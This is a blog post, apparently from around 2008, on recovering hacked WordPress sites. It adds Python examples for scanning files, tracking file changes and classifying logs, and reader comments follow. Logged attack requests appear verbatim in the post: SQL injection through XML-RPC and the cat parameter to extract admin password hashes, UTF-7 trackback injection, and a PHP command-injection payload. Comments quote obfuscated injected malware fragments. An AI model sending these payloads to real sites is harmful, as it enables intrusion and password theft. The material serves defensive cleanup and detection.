Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn't you? No? Then it was inevitable that you'd be hacked. If you haven't been hacked yet, it's only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log themselves in again at a later date. That's how even diligently upgraded blogs were hacked: the bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit, and there is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They're using the old exploits all over again. This time they're hijacking hits that arrive at your blog from Google: those visitors are instead being redirected to your-needs.info and anyresult.net.

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. These take the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define('SECRET_KEY', '1234567890' );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won't be overwritten, so make sure you double-check those files for any strange code that uses eval() or base64_decode(). Here's a code snippet taken from here:

    <?php

    Another hack adds different code to your PHP files. Look for k1b0rg or keymachine.de in your PHP scripts and remove the offending code if you find it.

  • Check the .htaccess file in the root of your blog. If you've never edited it, it should look like this:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    That file may also contain this chunk, which relates to the uploader:

    <IfModule mod_security.c>
    <Files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </Files>
    </IfModule>

  • They're also uploading PHP code disguised as jpeg files to your uploads directory and adding those files to the active plugins list. This makes them harder to find, but not impossible:
    1. Open phpMyAdmin, go to your blog's options table and find the active_plugins record.
    2. Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you also remove the serialized array information for that array element. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This YouTube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record but it won't hurt to do it.
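    The hunt described in this section can be scripted. What follows is an added example written for this page; it is not code from the original post, from WordPress, or from the Exploit Scanner plugin mentioned later. It walks a copy of a WordPress tree looking for the strings the post names (eval, base64_decode, k1b0rg, keymachine.de) in PHP files and for a PHP open tag inside files named as images, and it parses the serialized active_plugins value to list and strip entries that are not plain plugin paths. The directory layout and the sample active_plugins string are constructed for the demo; treat anything it flags as "review by hand", since eval() and base64_decode() do have legitimate uses.

```python
import os
import re
import tempfile

# Strings the post tells you to look for in PHP files. A hit means "review this",
# not "definitely malicious".
SUSPICIOUS_MARKERS = (b"eval(", b"base64_decode(", b"gzinflate(", b"k1b0rg", b"keymachine.de")
IMAGE_SUFFIXES = (".jpg", ".jpeg", ".gif", ".png")


def scan_bytes(relpath, data):
    """Return the findings for one file given its name and raw contents."""
    findings = []
    lower_name = relpath.lower()
    # A "jpeg" in wp-content/uploads that starts with <?php is the disguised plugin trick.
    if lower_name.endswith(IMAGE_SUFFIXES) and b"<?php" in data:
        findings.append("php code inside a file named as an image")
    if lower_name.endswith(".php"):
        for marker in SUSPICIOUS_MARKERS:
            if marker in data:
                findings.append("contains " + marker.decode())
    return findings


def scan_tree(root):
    """Walk an install and return {relative path: [findings]} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                found = scan_bytes(name, fh.read())
            if found:
                report[os.path.relpath(full, root)] = found
    return report


def parse_php_string_array(serialized):
    """Parse a PHP serialize()d array of strings, e.g. a:1:{i:0;s:5:"hello";}.
    Works on bytes because PHP's s:N: length counts bytes, not characters."""
    blob = serialized.encode("utf-8")
    head = re.match(rb"a:(\d+):\{", blob)
    if not head:
        raise ValueError("not a serialized PHP array")
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        m = re.match(rb'i:\d+;s:(\d+):"', blob[pos:])
        if not m:
            raise ValueError("unsupported element at offset %d" % pos)
        start = pos + m.end()
        end = start + int(m.group(1))
        if blob[end:end + 2] != b'";':
            raise ValueError("bad string length at offset %d" % start)
        items.append(blob[start:end].decode("utf-8"))
        pos = end + 2
    if blob[pos:pos + 1] != b"}":
        raise ValueError("array not terminated")
    return items


def serialize_php_string_array(items):
    """Inverse of parse_php_string_array, re-indexing from 0 as WordPress expects."""
    body = "".join('i:%d;s:%d:"%s";' % (i, len(v.encode("utf-8")), v) for i, v in enumerate(items))
    return "a:%d:{%s}" % (len(items), body)


def is_plugin_path(entry):
    """A genuine active_plugins entry is 'dir/file.php' (or 'file.php') relative to
    wp-content/plugins: no parent-directory traversal, no absolute path, .php suffix."""
    return ".." not in entry.split("/") and not entry.startswith("/") and entry.lower().endswith(".php")


def clean_active_plugins(serialized):
    """Return (cleaned serialized value, list of entries that were removed)."""
    entries = parse_php_string_array(serialized)
    keep = [e for e in entries if is_plugin_path(e)]
    removed = [e for e in entries if not is_plugin_path(e)]
    return serialize_php_string_array(keep), removed


if __name__ == "__main__":
    # Constructed sample install: one clean file, a theme file carrying an
    # eval(base64_decode()) payload, and a "jpeg" in uploads that is really PHP.
    with tempfile.TemporaryDirectory() as root:
        files = {
            "wp-blog-header.php": b"<?php require_once('wp-load.php');\n",
            "wp-content/themes/default/footer.php": b"<?php eval(base64_decode('aWYo...'));\n",
            "wp-content/uploads/2008/05/04/jhjyahjhnjnva.jpg": b"<?php /* k1b0rg */ ...",
        }
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        for rel, found in sorted(scan_tree(root).items()):
            print(rel, "->", ", ".join(found))

    # Constructed active_plugins value with a disguised plugin appended to it.
    sample = ('a:2:{i:0;s:19:"akismet/akismet.php";'
              'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";}')
    cleaned, removed = clean_active_plugins(sample)
    print("removed:", removed)
    print("cleaned:", cleaned)
```

    Run it against a copy of the files, not the live site, and compare the cleaned active_plugins string against the original before writing it back with phpMyAdmin. If the parser raises on your record (for example because a plugin path contains a non-ASCII character it cannot round-trip), fall back to the post's advice of deleting the record and reactivating plugins.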

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn't added another user account he can use to log in again.

Stop the bad guys

One way of stopping the bad guys before they've done any major damage is to take regular backups and install an intrusion detection system (IDS).

  • I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire, but there are many others. I just installed AIDE to track changes on this server. It gives me a daily report of the files that have changed in that period. If a hacker has changed a script or uploaded malicious code I'll get an email about it within a day. It does take some fine tuning, but it's easy to install on Debian systems (and presumably just as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That tells AIDE to track changes to my web server folders but ignore the logs folder and the cache folders.
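    To make those rules concrete, here is an added example of my own, not the post's and not AIDE itself, that does in Python what the configuration above asks of AIDE: hash every file under a web root, skip paths matching exclusion regexes like the logs and cache rules, and diff two snapshots to report added, removed and changed files. The /home/web paths mirror the post's config; the in-memory sample tree is constructed.

```python
import hashlib
import os
import re

# Exclusions in the spirit of the AIDE rules above (constructed to mirror them):
# a path matching any of these regexes is not tracked.
EXCLUDES = [
    r"^/home/www/logs/.*",
    r"^/home/web/public_html/wp-content/cache/.*",
    r"^/home/web/.*/htdocs/wp-content/cache/.*",
]


def is_excluded(path, excludes=EXCLUDES):
    """True when the path matches one of the '!' style exclusion patterns."""
    return any(re.match(pattern, path) for pattern in excludes)


def snapshot_from_mapping(files, excludes=EXCLUDES):
    """Build {path: sha256} from a {path: bytes} mapping, honouring exclusions.
    Kept separate from disk access so it can be exercised offline."""
    return {
        path: hashlib.sha256(data).hexdigest()
        for path, data in files.items()
        if not is_excluded(path, excludes)
    }


def snapshot_tree(root, excludes=EXCLUDES):
    """Read every regular file under root and build a snapshot of it."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not is_excluded(full, excludes):
                with open(full, "rb") as fh:
                    files[full] = fh.read()
    return snapshot_from_mapping(files, excludes)


def diff_snapshots(baseline, current):
    """What the daily report boils down to: added, removed and changed paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


if __name__ == "__main__":
    # Constructed sample: yesterday's tree versus today's, where a theme file was
    # modified, a PHP file appeared in uploads, and only the cache and logs churned.
    yesterday = {
        "/home/web/public_html/wp-blog-header.php": b"<?php require_once('wp-load.php');\n",
        "/home/web/public_html/wp-content/themes/default/footer.php": b"<?php wp_footer(); ?>\n",
        "/home/web/public_html/wp-content/cache/page1.html": b"cached",
        "/home/www/logs/access.log": b"old log",
    }
    today = dict(yesterday)
    today["/home/web/public_html/wp-content/themes/default/footer.php"] = b"<?php eval(base64_decode('...')); wp_footer(); ?>\n"
    today["/home/web/public_html/wp-content/uploads/2008/05/04/jhjyahjhnjnva.jpg"] = b"<?php ..."
    today["/home/web/public_html/wp-content/cache/page1.html"] = b"recached"
    today["/home/www/logs/access.log"] = b"new log"
    report = diff_snapshots(snapshot_from_mapping(yesterday), snapshot_from_mapping(today))
    for kind, paths in report.items():
        for path in paths:
            print(kind, path)
```

    The important property, and the reason the post excludes cache and log directories, is that the baseline must be quiet: if every run reports churn, the one line that says a theme file changed gets lost in the noise. The baseline itself also has to live somewhere the web server cannot write, or an intruder who can plant a backdoor can update the baseline to match.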

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5-minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com, go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you whether their copy of WordPress is out of date. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I log requests on one of my test blogs and come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding, so a website will be hit with all sorts of attacks, even ones aimed at software that isn't installed. The bots are so dumb they'll even come back again and again performing the same attacks.

Here's what I call the "ekibastos attack". It happens over a number of requests and I've seen it come from 87.118.100.81 on a regular basis. It uses a user agent called "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)", which strangely enough doesn't show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then, without even checking whether that was successful, tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
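The requests in the "ekibastos attack" walkthrough and in the PS above are exactly the kind of thing a defender can recognise in access logs. The following is an added example written for this page, not code from the original post or from WordPress: it parses Apache combined-format log lines, URL-decodes the query twice (the %2527 in the GET requests above is a double-encoded quote), and flags the SQL-injection patterns, the k1b user agent and the HEAD probes of wp-admin that the attack uses; it also checks trackback fields and XML-RPC bodies for the UTF-7 quote trick and for PHP code stuffed into a parameter. The log lines and bodies are constructed from the requests quoted in the post, with the post's IP and user agent and made-up timestamps; the tag names are my own.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log: ip ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns drawn from the requests quoted in the post. They are matched against the
# decoded query so that %2527, %27 and a literal quote all look the same.
SQLI_RE = re.compile(r"union\s+(all\s+)?select|\bwp_users\b|\bconcat\s*\(|/\*\s*$", re.I)
BAD_UA_RE = re.compile(r"k1b|Windows Sot", re.I)
PHP_INJECT_RE = re.compile(r"\b(passthru|eval|system|exec|shell_exec)\s*\(|exit\s*;\s*/\*", re.I)

# Constructed log lines modelled on the post's requests (IP and UA from the post).
SAMPLE_LOG = """\
87.118.100.81 - - [05/May/2008:10:01:02 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
87.118.100.81 - - [05/May/2008:10:01:09 +0100] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
192.0.2.10 - - [05/May/2008:10:02:00 +0100] "GET /category/wordpress/ HTTP/1.1" 200 8123 "http://www.google.com/search?q=wordpress" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Constructed XML-RPC bodies, shortened from the two payloads quoted in the post.
SAMPLE_XMLRPC_MULTICALL = (
    '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
    "<params><param><value><array><data><value><struct>"
    "<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>"
    "<member><name>params</name><value><array><data><value><string>"
    "http://example.com/category/&post_type=%27) UNION ALL SELECT 1,2,3 FROM wp_users WHERE ID=1%2F*"
    "</string></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>"
)
SAMPLE_XMLRPC_PHP = (
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param>'
    "<value><name>','')); echo 'x'; passthru('id'); exit;/*</name></value>"
    "</param></params></methodCall>"
)


def decode_twice(text):
    """Decode twice so a double-encoded %2527 and a single %27 both become a quote."""
    return unquote_plus(unquote_plus(text))


def classify_request(method, path, user_agent):
    """Label a single request line; returns a (possibly empty) list of tags."""
    tags = []
    if SQLI_RE.search(decode_twice(path)):
        tags.append("sql-injection")
    if BAD_UA_RE.search(user_agent):
        tags.append("known-bad-user-agent")
    if method == "HEAD" and path.startswith("/wp-admin/"):
        tags.append("admin-probe")
    return tags


def classify_trackback(fields):
    """Inspect a decoded wp-trackback.php POST body given as {field: value}."""
    tags = []
    if fields.get("charset", "").upper() == "UTF-7" or "+AFw-" in " ".join(fields.values()):
        tags.append("utf7-encoded-quote")   # +AFw- is a backslash in UTF-7
    if "'" in fields.get("tb_id", ""):
        tags.append("quote-in-tb_id")        # tb_id should be a bare post ID
    return tags


def classify_xmlrpc(body):
    """Inspect a raw xmlrpc.php POST body."""
    tags = []
    if "system.multicall" in body and SQLI_RE.search(decode_twice(body)):
        tags.append("xmlrpc-multicall-sqli")
    if PHP_INJECT_RE.search(body):
        tags.append("xmlrpc-php-injection")
    return tags


def scan_log(text):
    """Parse log lines and return [(ip, method, path, tags)] for the suspicious ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["method"], m["path"], m["ua"])
        if tags:
            hits.append((m["ip"], m["method"], m["path"], tags))
    return hits


if __name__ == "__main__":
    for ip, method, path, tags in scan_log(SAMPLE_LOG):
        print(ip, method, path[:60], tags)
    print(classify_trackback({"url": "ekibastos", "blog_name": "+AFw-')/*", "charset": "UTF-7"}))
    print(classify_xmlrpc(SAMPLE_XMLRPC_MULTICALL), classify_xmlrpc(SAMPLE_XMLRPC_PHP))
```

The access log only carries the request line, so the trackback and XML-RPC checks need the POST body, which means either the kind of request logging the post describes or a mod_security-style rule in front of PHP. Counting tagged requests per IP over a day is the cheapest way to turn these labels into the "same bot, same attacks, again and again" picture the post paints.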

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Comments

387 Replies to “Did your WordPress site get hacked?”

  1. Hi there :)) Looking desperately for help 🙂 I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up? Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I'd be so grateful. Thank you :))

  2. My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to click the default permalink structure again and click save changes, now your posts should be working again, mine started working again.

    I admit, I had to upgrade my blog for many months, but I am too lazy for some things sometimes, but not anymore, now I got smarter, way smarter to be hacked again.

  3. Thank you for all this useful information. Unfortunately it's a matter of time until a WordPress blog will be attacked by hackers, in a form or other. The main rule is a constant DB backup. Upgrade your WP and the plugins when it's possible, try to protect as much as you can, in this article you can find useful details, but don't forget, secure your important data by regular backups.

  4. For the sake of helping of course, I want to say something else.

    When I was hacked, I mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, I guess the hacker who wrote the worm did not want to make damage, real and extensive damage I mean, I guess he wanted only to scare people into upgrading their wordpress blog which makes me think a lot, I mean, who would want to scare every wordpress blog user into upgrading to the latest patch!!!?

    But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, I explain in the next paragraph.

    If you go to the theme editor in the appearance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation in your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, I mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the file permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code into the files you just changed permissions to writable.

    Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, believe me, I really informed myself on this, delete it and deactivate the service by going to the wordpress control panel, then in general options in some menu I can not recall the name, just browse through all and set it off, you do not need that.

    Hope I helped.

  5. Several of my sites were exploited by a hacker recently. As far as I am aware the hack used the wordpress php vulnerability to gain access to my server and rather than creating havoc with wordpress files appears to have defaced one of my html sites by deleting the home page and uploading his or her own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! Changed all passwords, ftp, admin, sql and any other I could think of! It really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so it's a good deterrent.

  6. As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.

    Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.

    Henceforth, I thought I was running with WP 2.8.4.

    That is, until yesterday!

    cPanel – Fantastico | WordPress

    displayed in RED upgrade now to WP 2.8.4

    Shock horror!

    Install by Fantastico and it controls WordPress.

    Upgrades by WP WordPress do not update.

    Warning:

    WordPress upgrades – immediate.

    Fantastico WP upgrades – timing delay, therefore, security risk.

    My site has been hacked.

  7. My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1”); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.

    1. Thank you so much for this article. I've recently been hacked with HIDDEN Spam links in my header.
      I did find a bunch of 'fake' users in my Users file in myPHPadmin and deleted them.
      Then I changed my WP name/password.
      But the links came back a week later.
      Now I see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
      ROSACEA:
      How do I know what is safe to delete??
      I feel like I am flying blind.

      Any other tips will be appreciated.

        1. Hi Donncha-
          Thank you SO much for replying to me. So even though I keep deleting these hidden links from my header.php and then re-upload the original header.php and I've changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!

          I've also deleted fake users and some odd user metadata.
          Now, I ran your Exploit plugin and this:
          <?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
          …plus a bunch of script comes up in what appears to be every plugin.

          It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) I don't know what's okay and what is not. I am no expert. Please help. What do I do next? Thank you so much!!
          Lisa

  8. Site was hacked yesterday…..
    The code at the bottom of this reply was added to several php files and script.js files.
    I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
    I hope it is all clean now but know I have to do more to prevent this from happening again.

    I am so annoyed that there are idiots spoiling people's fun of setting up a website!

    Thanks for the tips mentioned above, they helped me get the site back up and running, but I am still trying to find better security to prevent this from happening again.

    Any tips are welcome!

    /*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf…. etcetera, you get the point

    1. Thanks, this script is brilliant. Still getting hacked regularly so I haven't solved the underlying problem but by running your script the site is up most of the time. I am setting up a new site, with all new usernames and passwords.
      Had to reinstall my pc as well because it got infected 🙁

  9. My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com

    1. Ed – didn’t you read the entire article?

      It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.

      I would do it with next steps:
      1. backup entire mySql database to local computer
      2. delete mySql database and create new mySql database
      3. restore tables from local backup
      4. check tables for users and change passwords (hacker might have old passwords)
      5. create clean install of latest wordpress
      6. upgrade data in mysql as needed

      Hope this helps…

      1. I'm still not clear on this… if I delete the DB then upload the one I backed up, won't it contain the fake users still?

  10. Like many, I've had not only a wordpress site hacked but then my server, and not for the first time. Yes I backup but that's not the point.

    It's come to a point where I changed hosts, which took time and money.

    1. Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?

  11. Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?

  12. Thanks so much for the advice it came in very handy.

    In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.

    It blocked me..

    1. I couldn’t perform from Firefox a simple view source code
    2. Even with “NoScript” on full alert
    3. Every time I would try, it would try to give me a Trojan.
    4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
    5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.

    Thanks again so much for your help.

  13. Donncha,
    I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :

    Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121

    I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.

    Peace,
    Madhu
    INDIMAG.com

    1. “Disk quota exceeded” – your disk is full.

      Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.

      1. Donncha,
        I know of the NFS but to get local it costs and I'm living with it.

        On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…

  14. Hi Donncha,
    You've given really great information here and I will definitely apply it. I only have one problem: I can't even get into the back end of my blog!! Do you have any suggestions?

    When I try to go in with firefox, my antivirus comes up with the Mal/iframe-f. If I try to go in with IE it doesn't let me even get near the blog front end or backend.

    Once I log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. Do you ever do paid work?

    (coz I am at my wits' end and I don't have enough knowledge of php to know what to delete and what not to)

    I have upgraded, added exploit, have manually looked through files for obvious iframes (didn't look for the rest of the code you've revealed here though).
    Have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!

    any advice is appreciated

    Please let me know about the paid thing

    Thanks
    Gaylea

  15. I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…

    One is called WordPress Firewall. It basically protects your WordPress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pros: Closes another door or two in the face of hackers. Cons: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)

    Another is WordPress Antivirus. This basically scans your theme files for injected type code. Though not foolproof, it does add another layer of possible protection.

    I also use WordPress Scanner to scan my installation for security holes.

    Just Google any of these names and the word “wordpress” or “plugin” at the same time.

    And remember, the safety of your blog and your visitors is in your hands… get proactive.

  16. I use WPMU and Love WordPress !! I had 13 sites totaling 4000+ "Real" members, and within a few hours I had 10,000+ fake members all mixed in! And no sites! Most of the fake blogs and user emails I noticed (later) were short first-name-sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
    I also found a theme with files all cute and pretty :{ with images labeled as a lot of the codes you mention above, theme was named flavour-extended-png in the themes folder, I am almost sure it is infected. Thank you for all the help wordpress world 🙂

    Keep the Faith 🙂

  17. Ok First up.

    1. I have 5 wordpress sites all got hacked into during March. The first one http://www.vincecianci.com is reported as an attack site and supposedly has malware on it. The google message appears upon trying to load the site. The same thing has happened on my other sites too.

    2. I can't access ANY of my sites through the standard wordpress login page, as if my own passwords have been changed.

    3. I am not tech savvy at all. I checked most of my files on each of the 5 wordpress sites and it appears ok to me but what do I know. I have zero php, ftp experience. My hosting provider GoDaddy can't do anything so I feel I am out of options.

    Any ideas here guys??

    Vince.

